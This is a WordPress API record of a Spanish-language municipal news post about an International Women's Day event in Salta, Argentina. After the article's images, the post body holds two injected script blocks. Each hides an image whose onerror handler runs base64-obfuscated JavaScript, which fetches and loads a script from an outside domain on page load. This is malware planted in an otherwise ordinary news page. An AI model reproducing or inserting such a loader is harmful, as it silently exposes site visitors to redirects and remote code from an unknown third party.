{"id":2329,"date":"2023-03-09T12:17:14","date_gmt":"2023-03-09T15:17:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2329"},"modified":"2025-08-14T00:21:34","modified_gmt":"2025-08-14T03:21:34","slug":"8m-la-municipalidad-de-salta-reconocio-el-lugar-de-la-mujer-en-nuestra-sociedad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2329","title":{"rendered":"8M: la Municipalidad de Salta reconoci\u00f3 el lugar de la mujer en nuestra sociedad"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#5b0b3a\"><strong><em>M\u00e1s de 300 vecinas de la ciudad conmemoraron el d\u00eda de la mujer en el Cabildo Hist\u00f3rico de Salta.<\/em><\/strong><\/h3>\n\n\n\n<p>La Municipalidad de Salta reuni\u00f3 en el Cabildo Hist\u00f3rico de la ciudad a m\u00e1s de 300 mujeres de distintos sectores profesiones y amas de casa, en donde se las reconoci\u00f3 por el protagonismo que est\u00e1n ganando d\u00eda a d\u00eda y el progreso que generan con su trabajo.<\/p>\n\n\n\n<p>En la ocasi\u00f3n tambi\u00e9n se debatieron las pol\u00edticas de prevenci\u00f3n de violencia de g\u00e9nero y de igualdad de la mujer, y se presentaron nuevas propuestas para hacer de Salta una ciudad cada vez m\u00e1s igualitaria.<\/p>\n\n\n\n<p>\u00abPara que Salta se desarrolle es indispensable el aporte y el rol de las mujeres en todos los \u00e1mbitos de nuestra comunidad. Por eso, sigamos trabajando unidas y en red para mejorar el presente y en pos de las generaciones futuras\u00bb, se\u00f1al\u00f3 Bettina Romero.<\/p>\n\n\n\n<p>Marta de la Zerda que particip\u00f3 del encuentro, agradeci\u00f3 la iniciativa y subray\u00f3 que: \u00abDesde nuestra Asociaci\u00f3n Cultural Hero\u00ednas Hispanoamericanas venimos revalorizando hace mucho tiempo a la mujer. Fue important\u00edsimo este espacio con mujeres de diferentes sectores de la sociedad, nos llevamos muchas ideas y fuerza\u00bb.<\/p>\n\n\n\n<p>Y luego, la Intendenta, agreg\u00f3: \u00abEn Salta impulsamos una sociedad m\u00e1s justa a trav\u00e9s de acciones concretas como microcr\u00e9ditos para emprendedoras, capacitaciones barriales y becas estudiantiles. Seguiremos trabajando por la igualdad, la participaci\u00f3n y el empoderamiento de la mujer\u00bb.<\/p>\n\n\n\n<p>En 2022 la Municipalidad de Salta capacit\u00f3 a 40.000 vecinas en artes y oficios y destin\u00f3 15 millones de pesos en microcr\u00e9ditos para apoyar el crecimiento de mujeres emprendedoras. Tambi\u00e9n organiz\u00f3 1.500 talleres de prevenci\u00f3n en violencia de g\u00e9nero y realiz\u00f3 18.000 asistencias a v\u00edctimas de violencia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2023\/03\/img-20230308-wa02551.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/8m-la-municipalidad-reconocio-el-lugar-de-la-mujer-en-nuestra-sociedad\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/elementor\/thumbs\/cropped-logo-salta-web-pldsqt139g9d97lt2wmo19p728jyb8guu3vfb5fpm4.png\" alt=\"\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>M\u00e1s de 300 vecinas de la ciudad conmemoraron el d\u00eda de la mujer en el Cabildo Hist\u00f3rico de Salta. La Municipalidad de Salta reuni\u00f3 en el Cabildo Hist\u00f3rico de la ciudad a m\u00e1s de 300 mujeres de distintos sectores profesiones y amas de casa, en donde se las reconoci\u00f3 por el protagonismo que est\u00e1n ganando [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2330,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-2329","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2329"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2329"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2329\/revisions"}],"predecessor-version":[{"id":7151,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2329\/revisions\/7151"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2330"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}